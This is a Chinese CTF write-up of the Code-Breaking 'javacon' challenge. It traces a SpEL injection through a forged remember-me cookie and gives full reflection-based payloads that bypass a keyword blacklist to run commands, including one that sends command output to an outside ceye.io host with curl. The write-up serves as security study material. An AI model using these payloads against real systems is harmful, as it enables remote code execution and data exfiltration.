code-breaking之javacon
JAVACON 题目
此题 来自P神 的code-breaking中的一道Java题,名为javacon,题目知识点为SpEL注入
题目下载地址:https://www.leavesongs.com/media/attachment/2018/11/23/challenge-0.0.1-SNAPSHOT.jar
运行环境
java -jar challenge-0.0.1-SNAPSHOT.jar涉及知识
- SpEL 注入
- Java 反射机制
- Linux 反弹 shell
访问 页面,是一个登录界面,请求参数中带有 jsessionid 。
随便输入 admin 123 会提示 "登录失败 ..."
我们把 JAR 在 idea 里打开 ,目录结构大致如下
spring 框架, 先看 下面的 application.yml 配置文件
spring:thymeleaf:encoding: UTF-8cache: falsemode: HTML
keywords:blacklist:- java.+lang- Runtime- exec.*\(
user:username: adminpassword: adminrememberMeKey: c0dehack1nghere1此文件 分了三个模块 spring 定义了 HTML模板 UTF-8源码以及无缓存 ,keywords 定义了黑名单 ,过滤了 “java.lang”、“Runtime”、“exec.(”等 ; user 定义了 admin admin账号密码,还有一个 remembermeKey 的 value。
Spring 框架 关键点在于 Controller 也就是控制器,看到 MainController.class ,其中定义了ExpressionParser , 该属性在 getAdvanceValue() 函数中会调用来解析字符串内容,由此可知 getAdvanceValue() 是SpEL 注入的触发点:
@Controller
public class MainController {ExpressionParser parser = new SpelExpressionParser();...private String getAdvanceValue(String val) {String[] var2 = this.keyworkProperties.getBlacklist();int var3 = var2.length;for(int var4 = 0; var4 < var3; ++var4) {String keyword = var2[var4];Matcher matcher = Pattern.compile(keyword, 34).matcher(val);if (matcher.find()) {throw new HttpClientErrorException(HttpStatus.FORBIDDEN);}}ParserContext parserContext = new TemplateParserContext();Expression exp = this.parser.parseExpression(val, parserContext);SmallEvaluationContext evaluationContext = new SmallEvaluationContext();return exp.getValue(evaluationContext).toString();}
}再看看是哪里调用了 getAdvanceValue() 函数,可以发现是在admin()函数中调用了,传递的参数是username 的值:
public String admin(@CookieValue(value = "remember-me",required = false) String rememberMeValue, HttpSession session, Model model) {if (rememberMeValue != null && !rememberMeValue.equals("")) {String username = this.userConfig.decryptRememberMe(rememberMeValue);if (username != null) {session.setAttribute("username", username);}}Object username = session.getAttribute("username");if (username != null && !username.toString().equals("")) {model.addAttribute("name", this.getAdvanceValue(username.toString()));return "hello";} else {return "redirect:/login";}}这里需要研究一下 如何这个username的值,先看注解为 /login 的login() 函数,其传入3个参数,第三个 remember-me 是非必须的,在第一个if 语句中 他会判断 username 和password 的值是否匹配,如果匹配 则会 通过 session.setAttribute("username") 来设置username ,但是再这之前会判断username的 所以无法在username 中写入我们的payload 。也就是说这里无法进行SpEL 注入。
再来看看主页面的代码逻辑即注解为“@GetMapping”的admin()函数。先判断remember-me是否为空,为空时直接调用session.getAttribute("username");获取session中即login()函数中设置的username再调用getAdvanceValue()函数,此时因为username是正确的用户名因此无法SpEL注入;若rememberMeValue不为空即login时选择了remember-me,则解码rememberMeValue值为username并通过调用session.setAttribute("username")来设置session中的username值,此时的username就可控了。
那么注入点的场景已经可以确定了:输入admin/admin并勾选remember-me选项登录后台,然后再修改cookie内容即可。
先登录到admin界面,看到会设置Cookie字段值为remember-me=MXPUSANQRVaBJYtUucUgmQ==:
应该是一段base64 或者其他的加密 直接调用或复制加密代码 ,在他的代码中找到几个参数然后传入加密处理,执行完毕后和Cookie 字段值base64结果是一致的:
利用下mi1k7ea 师傅的图 将变量value从admin改为Mi1k7ea 得到加密值为4Hd10g7CuZZg5M1up1GExg==,放到cookie中发送报文,可以看到admin修改为Mi1k7ea,说明这里即为SpEL注入点:
构造payload
刚刚配置文件中的黑名单过滤了 java.lang、Runtime和exec( ,没有思路 参考wp Code-Breaking Puzzles — javacon WriteUp - Ruilin (rui0.cn)
可以使用JAVA的反射机制来进行绕过,原理是因为通过反射机制的 forName() 和 getMethod() 登方法, 其参数是字符串因此可通过字符串拼接的方式来进行绕过黑名单。
Windows环境
本地弹计算器
String.class.getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("exec",String.class).invoke(String.class.getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(String.class.getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"cmd","/C","calc"});
但是这里需要改为SpEl的解析格式以满足Spring的解析条件,主要就是改一个T() 。在SpEL中,使用T()运算符会调用类作用域的方法和常量。
注意,以new String[]{"cmd","/C","xx"}这种形式定义命令是为了满足Linux下复杂命令构造的条件,通用。当然Linux下应该写为new String[]{"/bin/bash","-c","xxxxx"}。
payload如下:
#{T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"cmd","/C","calc"})}加密后发送过去,SpEL注入成功:
回带flag
这里换下payload,读取本地flag文件,由于没有回显,需要外带出来,使用curl命令结合反引号执行系统命令并带回:
#{T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("ex"+"ec",T(String[])).invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime").getMethod("getRu"+"ntime").invoke(T(String).getClass().forName("java.l"+"ang.Ru"+"ntime")),new String[]{"cmd","/C","curl xx.ceye.io/`dir`"})}参考
Code-Breaking Puzzles — javacon WriteUp - Ruilin (rui0.cn)
code-breaking全部题解及知识拓展 - 先知社区 (aliyun.com)